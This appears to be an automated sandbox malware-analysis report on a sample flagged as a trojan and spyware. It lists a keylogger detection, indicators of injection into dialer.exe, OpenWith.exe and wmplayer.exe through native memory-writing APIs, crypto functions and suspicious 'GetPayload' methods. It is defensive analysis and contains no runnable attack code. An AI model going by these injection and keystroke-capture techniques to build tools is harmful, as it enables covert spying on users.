Installs a raw input device (often for capturing keystrokes)
Source: dialer.exe, 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_3f489398-6
Yara detected Keylogger Generic
Source: Yara match File source: 5.3.dialer.exe.4bb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.dialer.exe.4bb0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.dialer.exe.4bb0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.dialer.exe.4dd0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.dialer.exe.4bb0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dialer.exe PID: 8032, type: MEMORYSTR
Contains functionality to call native functions
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_000001F0D55130C7 RtlAllocateHeap,RtlAllocateHeap,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor, 15_3_000001F0D55130C7
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E575A540 NtAcceptConnectPort, 15_3_00007DF4E575A540
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E575A600 NtAcceptConnectPort, 15_3_00007DF4E575A600
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E575B154 NtAcceptConnectPort,NtAcceptConnectPort, 15_3_00007DF4E575B154
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E575B088 NtAcceptConnectPort,NtAcceptConnectPort, 15_3_00007DF4E575B088
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E575A2B0 NtAcceptConnectPort, 15_3_00007DF4E575A2B0
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E57592CC NtAcceptConnectPort,DuplicateHandle,NtAcceptConnectPort,??3@YAXPEAX@Z,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort, 15_3_00007DF4E57592CC
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5758C90 NtAcceptConnectPort, 15_3_00007DF4E5758C90
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5759CA0 _calloc_dbg,NtAcceptConnectPort, 15_3_00007DF4E5759CA0
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5758C08 NtAcceptConnectPort, 15_3_00007DF4E5758C08
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5759F40 NtAcceptConnectPort, 15_3_00007DF4E5759F40
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5758D74 NtAcceptConnectPort, 15_3_00007DF4E5758D74
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5758D94 NtAcceptConnectPort, 15_3_00007DF4E5758D94
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5759AF4 _malloc_dbg,NtAcceptConnectPort,NtAcceptConnectPort,??3@YAXPEAX@Z, 15_3_00007DF4E5759AF4
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5758AFC NtAcceptConnectPort, 15_3_00007DF4E5758AFC
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5758A40 NtAcceptConnectPort, 15_3_00007DF4E5758A40
Source: C:\Windows\System32\OpenWith.exe Code function: 15_2_000001F0D53B1A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler, 15_2_000001F0D53B1A90
Source: C:\Windows\System32\OpenWith.exe Code function: 15_2_000001F0D53B0AC8 NtAcceptConnectPort,NtAcceptConnectPort, 15_2_000001F0D53B0AC8
Source: C:\Windows\System32\OpenWith.exe Code function: 15_2_000001F0D53B15AC NtAcceptConnectPort, 15_2_000001F0D53B15AC
Source: C:\Windows\System32\OpenWith.exe Code function: 15_2_000001F0D53B1CD0 RtlAllocateHeap,NtAcceptConnectPort,FindCloseChangeNotification, 15_2_000001F0D53B1CD0
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_3_00007DF445C31CE8 _calloc_dbg,CreateProcessW,NtResumeThread,FindCloseChangeNotification,??3@YAXPEAX@Z, 16_3_00007DF445C31CE8
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_3_00007DF445C31958 _calloc_dbg,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory, 16_3_00007DF445C31958
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_0000020343292508 NtAcceptConnectPort, 16_2_0000020343292508
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432923F4 NtAcceptConnectPort, 16_2_00000203432923F4
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_0000020343292C40 NtAcceptConnectPort, 16_2_0000020343292C40
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432929B0 NtAcceptConnectPort, 16_2_00000203432929B0
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432928C4 NtAcceptConnectPort, 16_2_00000203432928C4
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_000002034329296C NtAcceptConnectPort, 16_2_000002034329296C
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_0000020343292894 NtAcceptConnectPort, 16_2_0000020343292894
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_0000020343292868 NtAcceptConnectPort, 16_2_0000020343292868
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_0000020343292794 NtAcceptConnectPort, 16_2_0000020343292794
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00007DF445C52704 NtQuerySystemInformation,_malloc_dbg,NtQuerySystemInformation, 16_2_00007DF445C52704
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5A385C NtQuerySystemInformation, 17_2_000001D3CF5A385C
Detected potential crypto function
Source: C:\Users\user\Desktop\nF54KOU30R.exe Code function: 0_3_03DB0AA0 0_3_03DB0AA0
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_000001F0D5514A38 15_3_000001F0D5514A38
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_000001F0D5512C3C 15_3_000001F0D5512C3C
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_000001F0D55124F7 15_3_000001F0D55124F7
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_000001F0D5515E7C 15_3_000001F0D5515E7C
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_000001F0D551557C 15_3_000001F0D551557C
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_000001F0D55158FC 15_3_000001F0D55158FC
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_000001F0D5511BA6 15_3_000001F0D5511BA6
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_000001F0D551279C 15_3_000001F0D551279C
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5767318 15_3_00007DF4E5767318
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5745BD8 15_3_00007DF4E5745BD8
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E574BEC4 15_3_00007DF4E574BEC4
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E579F4FC 15_3_00007DF4E579F4FC
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5788534 15_3_00007DF4E5788534
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E57AA3F4 15_3_00007DF4E57AA3F4
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E58293FC 15_3_00007DF4E58293FC
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E573E414 15_3_00007DF4E573E414
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E577C45C 15_3_00007DF4E577C45C
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E58173A0 15_3_00007DF4E58173A0
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E58183B8 15_3_00007DF4E58183B8
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E58246F8 15_3_00007DF4E58246F8
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5818750 15_3_00007DF4E5818750
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E574D688 15_3_00007DF4E574D688
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E57CB68C 15_3_00007DF4E57CB68C
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E57D40A0 15_3_00007DF4E57D40A0
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E579B094 15_3_00007DF4E579B094
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E580C01C 15_3_00007DF4E580C01C
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5796F78 15_3_00007DF4E5796F78
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5786FA0 15_3_00007DF4E5786FA0
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5743314 15_3_00007DF4E5743314
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E577D210 15_3_00007DF4E577D210
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5818238 15_3_00007DF4E5818238
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E58111BC 15_3_00007DF4E58111BC
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E58241DC 15_3_00007DF4E58241DC
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5817CF4 15_3_00007DF4E5817CF4
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5731BFC 15_3_00007DF4E5731BFC
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5740C44 15_3_00007DF4E5740C44
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E575EC44 15_3_00007DF4E575EC44
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5788BE8 15_3_00007DF4E5788BE8
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E57A6F20 15_3_00007DF4E57A6F20
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E581CF3C 15_3_00007DF4E581CF3C
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5829F40 15_3_00007DF4E5829F40
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E577CEC4 15_3_00007DF4E577CEC4
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5789E68 15_3_00007DF4E5789E68
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5813DE0 15_3_00007DF4E5813DE0
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E577F954 15_3_00007DF4E577F954
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E58158AC 15_3_00007DF4E58158AC
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E58178D8 15_3_00007DF4E58178D8
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E580780C 15_3_00007DF4E580780C
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5796834 15_3_00007DF4E5796834
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E574D850 15_3_00007DF4E574D850
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5787860 15_3_00007DF4E5787860
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E57577A0 15_3_00007DF4E57577A0
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E57717C4 15_3_00007DF4E57717C4
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E577C7E8 15_3_00007DF4E577C7E8
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5796B20 15_3_00007DF4E5796B20
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5796A10 15_3_00007DF4E5796A10
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5734A14 15_3_00007DF4E5734A14
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5784A14 15_3_00007DF4E5784A14
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E578A9C4 15_3_00007DF4E578A9C4
Source: C:\Windows\System32\OpenWith.exe Code function: 15_2_000001F0D53B0C5C 15_2_000001F0D53B0C5C
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_3_00007DF445C34EFC 16_3_00007DF445C34EFC
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_3_00007DF445C3392C 16_3_00007DF445C3392C
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_3_00007DF445C32204 16_3_00007DF445C32204
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_0000020343292D00 16_2_0000020343292D00
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_000002034328C254 16_2_000002034328C254
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_000002034328262C 16_2_000002034328262C
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432814D0 16_2_00000203432814D0
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432A6CE0 16_2_00000203432A6CE0
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432BECAC 16_2_00000203432BECAC
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_000002034329DCB4 16_2_000002034329DCB4
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432C0D58 16_2_00000203432C0D58
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432B959C 16_2_00000203432B959C
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432B5578 16_2_00000203432B5578
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432BCBBC 16_2_00000203432BCBBC
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432C63FC 16_2_00000203432C63FC
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432B0440 16_2_00000203432B0440
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_0000020343295AAC 16_2_0000020343295AAC
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_000002034329E368 16_2_000002034329E368
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432B4A18 16_2_00000203432B4A18
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432C3A15 16_2_00000203432C3A15
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432B3A00 16_2_00000203432B3A00
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_0000020343297240 16_2_0000020343297240
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432C0238 16_2_00000203432C0238
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432B58E0 16_2_00000203432B58E0
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432BF908 16_2_00000203432BF908
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432BE94C 16_2_00000203432BE94C
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432A0144 16_2_00000203432A0144
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432BF198 16_2_00000203432BF198
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_000002034329CFE0 16_2_000002034329CFE0
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432AD81C 16_2_00000203432AD81C
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432BA7E4 16_2_00000203432BA7E4
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432A705C 16_2_00000203432A705C
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432C083C 16_2_00000203432C083C
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432B4898 16_2_00000203432B4898
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_000002034329C720 16_2_000002034329C720
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_0000020343296EF4 16_2_0000020343296EF4
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432B3F38 16_2_00000203432B3F38
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432B4DB0 16_2_00000203432B4DB0
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_000002034329F5E8 16_2_000002034329F5E8
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432A764C 16_2_00000203432A764C
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432B5E90 16_2_00000203432B5E90
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_000002034329BE88 16_2_000002034329BE88
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432A3E6C 16_2_00000203432A3E6C
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00000203432A867C 16_2_00000203432A867C
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_00007DF445C422CC 16_2_00007DF445C422CC
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5B8EB8 17_2_000001D3CF5B8EB8
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5BF76C 17_2_000001D3CF5BF76C
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5C25B4 17_2_000001D3CF5C25B4
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5AC5D4 17_2_000001D3CF5AC5D4
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5CC668 17_2_000001D3CF5CC668
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5C4660 17_2_000001D3CF5C4660
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5BAE10 17_2_000001D3CF5BAE10
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5D1E08 17_2_000001D3CF5D1E08
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5AD604 17_2_000001D3CF5AD604
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5A8DF4 17_2_000001D3CF5A8DF4
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5CC500 17_2_000001D3CF5CC500
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5BA4F8 17_2_000001D3CF5BA4F8
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5B9D30 17_2_000001D3CF5B9D30
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5BE51C 17_2_000001D3CF5BE51C
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5B53C8 17_2_000001D3CF5B53C8
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5A737C 17_2_000001D3CF5A737C
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5ABC68 17_2_000001D3CF5ABC68
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5B92D4 17_2_000001D3CF5B92D4
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5C2AA0 17_2_000001D3CF5C2AA0
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5C3B40 17_2_000001D3CF5C3B40
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5B8980 17_2_000001D3CF5B8980
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5B9998 17_2_000001D3CF5B9998
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5C2254 17_2_000001D3CF5C2254
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5C3210 17_2_000001D3CF5C3210
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5C4144 17_2_000001D3CF5C4144
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5ABFE4 17_2_000001D3CF5ABFE4
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5B27A4 17_2_000001D3CF5B27A4
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5BA860 17_2_000001D3CF5BA860
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5B9818 17_2_000001D3CF5B9818
One or more processes crash
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 516
Sample file is different than original file name gathered from version info
Source: nF54KOU30R.exe, 00000000.00000002.1982649519.0000000003B60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTCPZ.exe, vs nF54KOU30R.exe
Source: nF54KOU30R.exe, 00000000.00000002.1982577509.00000000039C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTCPZ.exe, vs nF54KOU30R.exe
Source: nF54KOU30R.exe, 00000000.00000003.1979370491.0000000003DCB000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTCPZ.exe, vs nF54KOU30R.exe
Uses 32bit PE files
Source: nF54KOU30R.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 15.3.OpenWith.exe.1f0d742aad0.20.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.27.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.6.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.11.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.5.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.10.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.19.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.24.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.1.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: 15.3.OpenWith.exe.1f0d742aad0.14.raw.unpack, CallWrapper.cs Suspicious method names: .CallWrapper.GetPayload
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/0@1/2
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 16_2_000002034328262C CreateToolhelp32Snapshot,Thread32First,Thread32Next,FindCloseChangeNotification,SuspendThread, 16_2_000002034328262C
Source: C:\Windows\SysWOW64\dialer.exe Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\a63dd526-0b01-49db-ba4f-0abb4644ea93 Jump to behavior
Source: nF54KOU30R.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\nF54KOU30R.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
